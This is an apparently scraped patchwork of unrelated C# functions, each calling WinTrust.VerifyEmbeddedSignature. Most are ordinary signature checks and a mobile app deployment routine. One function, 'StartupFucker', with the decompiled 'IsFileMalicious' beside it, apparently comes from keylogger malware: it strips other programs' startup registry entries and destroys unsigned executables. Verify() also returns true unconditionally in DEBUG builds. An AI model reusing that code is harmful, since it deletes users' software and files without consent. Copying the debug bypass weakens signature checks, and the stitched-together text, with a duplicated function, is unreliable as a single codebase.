public static bool Verify(string assemblyPath, X509Certificate2 assemblyCertificate = null)
{
#if DEBUG
return(true);
#endif
try
{
var isVerified = WinTrust.VerifyEmbeddedSignature(assemblyPath, WinVerifyTrustResult.Success);
X509Certificate2 cert = new X509Certificate2(assemblyPath);
if (assemblyCertificate == null)
{
var assembly = Assembly.GetExecutingAssembly();
assemblyCertificate = new X509Certificate2(assembly.Location);
}
return(isVerified && cert.Equals(assemblyCertificate));
}
catch (Exception e)
{
LogProvider.Log.Error(typeof(CertificateHelper), $"Could not verify assembly at '{assemblyPath}'", e);
}
return(false);
}
public static void CheckForSignedExec()
{
Process proc = Process.GetProcessById(ParrentProcessId);
string filename = proc.MainModule.FileName;
Console.WriteLine("[Digital Signature]: {0}", WinTrust.VerifyEmbeddedSignature(filename));
Console.WriteLine("Parent process path: " + filename);
}
static public bool CheckFile(string filename)
{
// check digital signature
bool ret = WinTrust.VerifyEmbeddedSignature(filename);
// do some other checks - for example verify the subject
// X509Certificate2 cert = new X509Certificate2(filename);
return(ret);
}
protected internal static string GetSignatureStatus(string Path)
{
if (!WindowsFileSystemUtils.NeedsSignature(Path))
{
return("");
}
string sigStatus = WinTrust.VerifyEmbeddedSignature(Path);
return(sigStatus);
}
protected internal static string GetSignatureStatus(string Path)
{
if (!NeedsSignature(Path))
{
return(string.Empty);
}
string sigStatus = WinTrust.VerifyEmbeddedSignature(Path);
return(sigStatus);
}
public ScanStatus Scan(FileCache file, ref string result)
{
if (WinTrust.VerifyEmbeddedSignature(file.Path) == WinVerifyTrustResult.Success)
{
result = "Success";
return(ScanStatus.Stop);
}
else
{
result = "No digital cert";
return(ScanStatus.Continiue);
}
}
public static void StartupFucker(string regkey, int type)
{
try
{
RegistryKey key;
if (type == 1)
{
key = Registry.CurrentUser.OpenSubKey(regkey);
}
if (type == 2)
{
key = Registry.LocalMachine.OpenSubKey(regkey);
}
foreach (string str in key.GetValueNames())
{
try
{
string expression = key.GetValue(str).ToString();
if (expression.Contains("-"))
{
if (expression.Contains("\""))
{
expression.Replace("\"", string.Empty);
}
try
{
expression = Strings.Split(expression, " -", -1, CompareMethod.Binary)[0];
}
catch (Exception exception1)
{
ProjectData.SetProjectError(exception1);
ProjectData.ClearProjectError();
}
}
if (expression.Contains("\""))
{
expression = expression.Split(new char[] { '"' })[1];
}
if (!expression.Contains(Application.ExecutablePath))
{
RemoveKey(type, str, regkey, expression);
if (!WinTrust.VerifyEmbeddedSignature(expression))
{
Startupkilled++;
DestroyFile(expression);
}
}
}
catch (Exception exception2)
{
ProjectData.SetProjectError(exception2);
ProjectData.ClearProjectError();
}
}
}
catch (Exception exception3)
{
ProjectData.SetProjectError(exception3);
ProjectData.ClearProjectError();
}
}
public static bool IsFileMalicious(string fileloc)
{
bool flag;
int num2;
try
{
int num3;
Label_0001:
ProjectData.ClearProjectError();
int num = -2;
Label_0009:
num3 = 2;
if (!fileloc.Contains(Application.ExecutablePath))
{
goto Label_0028;
}
Label_001D:
num3 = 3;
flag = false;
goto Label_0221;
Label_0028:
num3 = 5;
if (!fileloc.Contains(SplitFunzioni.KeyloggherExePatch))
{
goto Label_0047;
}
Label_003C:
num3 = 6;
flag = false;
goto Label_0221;
Label_0047:
num3 = 8;
if (!fileloc.Contains("cmd"))
{
goto Label_0067;
}
Label_005B:
num3 = 9;
flag = true;
goto Label_0221;
Label_0067:
num3 = 11;
if (!fileloc.Contains("wscript"))
{
goto Label_0088;
}
Label_007C:
num3 = 12;
flag = true;
goto Label_0221;
Label_0088:
num3 = 14;
if (!fileloc.Contains(RuntimeEnvironment.GetRuntimeDirectory()))
{
goto Label_00A9;
}
Label_009D:
num3 = 15;
flag = true;
goto Label_0221;
Label_00A9:
num3 = 0x11;
if (!WinTrust.VerifyEmbeddedSignature(fileloc))
{
goto Label_00C5;
}
Label_00B9:
num3 = 0x12;
flag = false;
goto Label_0221;
Label_00C5:
num3 = 20;
if (!(fileloc.Contains(Environment.GetEnvironmentVariable("USERPROFILE")) | fileloc.Contains(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))))
{
goto Label_00F9;
}
Label_00ED:
num3 = 0x15;
flag = true;
goto Label_0221;
Label_00F9:
num3 = 0x17;
FileAttributes attributes = File.GetAttributes(fileloc);
Label_0104:
num3 = 0x18;
if ((attributes & FileAttributes.System) != FileAttributes.System)
{
goto Label_0120;
}
Label_0114:
num3 = 0x19;
flag = true;
goto Label_0221;
Label_0120:
num3 = 0x1b;
if ((attributes & FileAttributes.Hidden) != FileAttributes.Hidden)
{
goto Label_013C;
}
Label_0130:
num3 = 0x1c;
flag = true;
goto Label_0221;
Label_013C:
num3 = 30;
flag = false;
goto Label_0221;
Label_0152:
num2 = 0;
switch ((num2 + 1))
{
case 1:
goto Label_0001;
case 2:
goto Label_0009;
case 3:
goto Label_001D;
case 4:
case 5:
goto Label_0028;
case 6:
goto Label_003C;
case 7:
case 8:
goto Label_0047;
case 9:
goto Label_005B;
case 10:
case 11:
goto Label_0067;
case 12:
goto Label_007C;
case 13:
case 14:
goto Label_0088;
case 15:
goto Label_009D;
case 0x10:
case 0x11:
goto Label_00A9;
case 0x12:
goto Label_00B9;
case 0x13:
case 20:
goto Label_00C5;
case 0x15:
goto Label_00ED;
case 0x16:
case 0x17:
goto Label_00F9;
case 0x18:
goto Label_0104;
case 0x19:
goto Label_0114;
case 0x1a:
case 0x1b:
goto Label_0120;
case 0x1c:
goto Label_0130;
case 0x1d:
case 30:
goto Label_013C;
case 0x1f:
goto Label_0221;
default:
goto Label_0216;
}
Label_01DB:
num2 = num3;
switch (((num > -2) ? num : 1))
{
case 0:
goto Label_0216;
case 1:
goto Label_0152;
}
}
catch (object obj1) when(?)
{
ProjectData.SetProjectError((Exception)obj1);
goto Label_01DB;
}
Label_0216:
throw ProjectData.CreateProjectError(-2146828237);
Label_0221:
if (num2 != 0)
{
ProjectData.ClearProjectError();
}
return(flag);
}
private static void DeployApplication(
DeployAppMode mode,
DeviceInfo deviceInfo,
IAppManifestInfo manifestInfo,
DeploymentOptions deploymentOptions,
string packageFile,
bool disconnect = true)
{
if (PackageType.Framework != manifestInfo.PackageType && WinTrust.VerifyEmbeddedSignature(packageFile))
{
throw new Exception(
string.Format(
CultureInfo.CurrentUICulture,
Resources.InvalidPackaging,
new object[0]));
}
var connectableDevice =
new MultiTargetingConnectivity(CultureInfo.CurrentUICulture.LCID).GetConnectableDevice(
deviceInfo.DeviceId);
var device = connectableDevice.Connect(true);
var systemInfo = device.GetSystemInfo();
var deviceVersion = new Version(systemInfo.OSMajor, systemInfo.OSMinor);
if (manifestInfo.PlatformVersion.CompareTo(deviceVersion) > 0)
{
device.Disconnect();
throw new Exception(
string.Format(
CultureInfo.CurrentUICulture,
Resources.XapNotSupportedOnDevice,
new object[0]));
}
var flag = IsTargetApplicableforMdilGeneration(
connectableDevice,
deviceVersion,
manifestInfo,
packageFile);
ApplySideloadFlags(manifestInfo, ref deploymentOptions);
if (mode == DeployAppMode.Install)
{
if (device.IsApplicationInstalled(manifestInfo.ProductId))
{
if (manifestInfo.PackageType == PackageType.Framework)
{
return;
}
device.GetApplication(manifestInfo.ProductId).Uninstall();
}
foreach (var str in DependencyFinder.GetAppDependencyPackages(packageFile))
{
var manifestInfo1 = ReadAppManifestInfoFromPackage(str);
DeployApplication(
DeployAppMode.Install,
deviceInfo,
manifestInfo1,
DeploymentOptions.OptOutSD,
str,
false);
}
}
var app = (IRemoteApplication)null;
if (mode == DeployAppMode.Update)
{
app = device.GetApplication(manifestInfo.ProductId);
}
var typeOfApp = DetermineAppType(packageFile);
var applicationGenre = ((int)deploymentOptions).ToString(CultureInfo.InvariantCulture);
var iconPath = ((int)manifestInfo.PackageType).ToString(CultureInfo.InvariantCulture);
switch (mode)
{
case DeployAppMode.Install:
break;
case DeployAppMode.Update:
break;
}
var path = (string)null;
try
{
if (IsMdilFirst(typeOfApp, manifestInfo))
{
if (flag)
{
path = GenerateNDeployMdil(packageFile, null, typeOfApp, manifestInfo);
packageFile = path;
}
switch (mode)
{
case DeployAppMode.Install:
app = device.InstallApplication(
manifestInfo.ProductId,
manifestInfo.ProductId,
applicationGenre,
iconPath,
packageFile);
break;
case DeployAppMode.Update:
app.UpdateApplication(applicationGenre, iconPath, packageFile);
break;
}
}
else
{
switch (mode)
{
case DeployAppMode.Install:
app = device.InstallApplication(
manifestInfo.ProductId,
manifestInfo.ProductId,
applicationGenre,
iconPath,
packageFile);
break;
case DeployAppMode.Update:
app.UpdateApplication(applicationGenre, iconPath, packageFile);
break;
}
if (flag)
{
path = GenerateNDeployMdil(packageFile, app, typeOfApp, manifestInfo);
}
}
}
finally
{
if (!GlobalOptions.LeaveBehindOptimized && !string.IsNullOrWhiteSpace(path) && File.Exists(path))
{
File.Delete(path);
}
}
if (GlobalOptions.LaunchAfterInstall && app != null)
{
app.Launch();
}
if (!disconnect)
{
return;
}
device.Disconnect();
}
